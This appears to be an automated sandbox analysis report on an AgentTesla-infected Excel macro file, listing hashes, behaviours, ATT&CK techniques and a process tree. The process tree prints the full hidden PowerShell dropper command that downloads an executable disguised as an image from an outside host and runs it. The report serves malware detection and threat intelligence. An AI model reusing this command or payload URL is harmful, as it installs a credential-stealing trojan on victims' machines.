agenttesla | fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011

General

Target

CO-MFE-6-2020.xlsm
Size

173KB
MD5

84ba27c4b3083be263a54322adec3149
SHA1

2548d9097c1b27f064a7089afe393fde0fbfa64d
SHA256

fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
SHA512

1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e

Score

10^/10

spyware keylogger trojan stealer agenttesla

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://shopcart.indbytes.com/cig/4501307788.jpg

Signatures

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

EXCEL.EXERegAsm.exe

pid process

1072 EXCEL.EXE
1072 EXCEL.EXE
1072 EXCEL.EXE
1132 RegAsm.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeRegAsm.exe

pid process

1784 powershell.exe
1784 powershell.exe
1132 RegAsm.exe
1132 RegAsm.exe
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1784 powershell.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1072 EXCEL.EXE
Executes dropped EXE 1 IoCs

Processes:

Name.exe

pid process

1984 Name.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Office loads VBA resources, possible macro or embedded object present
Drops startup file 1 IoCs

Processes:

Name.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe Name.exe

pid	process
1072	EXCEL.EXE
1072	EXCEL.EXE
1072	EXCEL.EXE
1132	RegAsm.exe

pid	process
1784	powershell.exe
1784	powershell.exe
1132	RegAsm.exe
1132	RegAsm.exe

flow	pid	process
5	1784	powershell.exe

pid	process
1072	EXCEL.EXE

pid	process
1984	Name.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	Name.exe

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1780	1072	cmd.exe	EXCEL.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeName.exe

description	pid	process	target process
PID 1072 wrote to memory of 1780	1072	EXCEL.EXE	cmd.exe
PID 1072 wrote to memory of 1780	1072	EXCEL.EXE	cmd.exe
PID 1072 wrote to memory of 1780	1072	EXCEL.EXE	cmd.exe
PID 1780 wrote to memory of 1784	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1784	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1784	1780	cmd.exe	powershell.exe
PID 1784 wrote to memory of 1984	1784	powershell.exe	Name.exe
PID 1784 wrote to memory of 1984	1784	powershell.exe	Name.exe
PID 1784 wrote to memory of 1984	1784	powershell.exe	Name.exe
PID 1784 wrote to memory of 1984	1784	powershell.exe	Name.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe
PID 1984 wrote to memory of 1132	1984	Name.exe	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeRegAsm.exe

description pid process

Token: SeDebugPrivilege 1784 powershell.exe
Token: SeDebugPrivilege 1132 RegAsm.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

Name.exe

pid process

1984 Name.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Name.exe

description pid process target process

PID 1984 set thread context of 1132 1984 Name.exe RegAsm.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	pid	process
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1132	RegAsm.exe

pid	process
1984	Name.exe

description	pid	process	target process
PID 1984 set thread context of 1132	1984	Name.exe	RegAsm.exe

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Users\Admin\AppData\Local\Temp\Name.exe
"C:\Users\Admin\AppData\Local\Temp\Name.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:1984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

3

T1081

Discovery

Lateral Movement

Collection

Data from Local System

3

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Name.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Name.exe

Download Submit
memory/1072-1-0x0000000006FC0000-0x00000000070C0000-memory.dmp

Filesize
1024KB

Download
memory/1072-0-0x0000000006FC0000-0x00000000070C0000-memory.dmp

Filesize
1024KB

Download
memory/1132-8-0x0000000000446DEE-mapping.dmp

Download
memory/1132-7-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/1132-9-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/1132-10-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/1780-2-0x0000000000000000-mapping.dmp

Download
memory/1784-3-0x0000000000000000-mapping.dmp

Download
memory/1984-4-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing